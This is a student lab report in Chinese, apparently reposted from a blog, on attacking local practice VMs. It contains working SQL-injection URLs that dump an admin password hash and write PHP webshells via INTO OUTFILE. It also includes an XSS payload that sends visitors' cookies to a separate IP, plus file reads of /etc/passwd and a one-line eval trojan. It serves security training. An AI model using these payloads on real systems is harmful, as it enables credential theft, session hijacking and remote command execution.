实验报告 五
1.sql注入
首先搭建虛擬機 用kali掃描下當前網段 發現一個192.168.138.134的可疑ip地址
打開該虛擬機提供的網頁 使用發現可能存在sql注入點
http://192.168.138.134/cat.php?id=1
http://192.168.138.134/cat.php?id=1'
?
?
使用order by語句試出網站后臺數據庫表的列數 當order by 5 時網頁報錯 因此該查詢涉及到四列元素
?
?
?
?
使用聯合查詢 查看網頁的顯示位
?
?發現2是回顯位,發現數據庫的名字為photoblog
?
http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27
順勢查到數據庫中的表,可見users表對我們有用
http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27
繼續查詢users表中列名,有變量名 id,login,password
?查看users表中的數據:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2
http://192.168.138.134/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users
?
?
?
jiemi
MD5解密后,得到密碼P4ssw0rd
?
登錄到管理員頁面
嘗試上傳文件,發現nophp
改完后綴名發現,可以繞過,并上傳成功
?
?得到目錄,用菜刀連一下
?
?
?
2.xss靶機攻擊
nmap 掃描一下發現靶機開著80端口和ssh協議
發現有彈窗回顯,存在xss漏洞
在靶機上留言<script>document.write('<img src="http://192.168.138.139/?'+document.cookie+' "/>')</script>
可以將任意登錄用戶的cookie發送到指定ip 在指定 ip 接受 cookie 后可以偽造成登陸者
在原來機器上登錄admin賬戶,密碼P4ssw0rd
刷新下頁面,發現已經已admin的身份登錄進頁面中。
進入管理界面后,發現博客編輯界面存在sql注入漏洞。
?
http://192.168.138.135/admin/edit.php?id=4 union select 1,2,3,4
發現2和3可以顯示出來。
?
http://192.168.138.135/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4
可以讀取passwd文件,但是不能讀取shadow文件。我們嘗試能不能創建一個文件。
在編輯頁面發現錯誤提示中有/var/www/classes 目錄,
?
嘗試后發現/var/www/css 目錄可寫。
于是構造語句:
http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
然后打開
http://192.168.138.135/css/s.php
說明s.php文件成功寫入到/var/www/css 目錄,下面將
<?php system($_GET['c']); ?>
寫入z.php中,構造url為:
http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
訪問z.php,并使用uname -a獲取系統信息。可以遠程執行命令。
下面寫入一句話木馬,構造url:
http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
?
轉載于:https://www.cnblogs.com/P201521410043/p/8906642.html
總結
- 上一篇: 基于jquery的秒表倒计时
- 下一篇: day02 听写 vue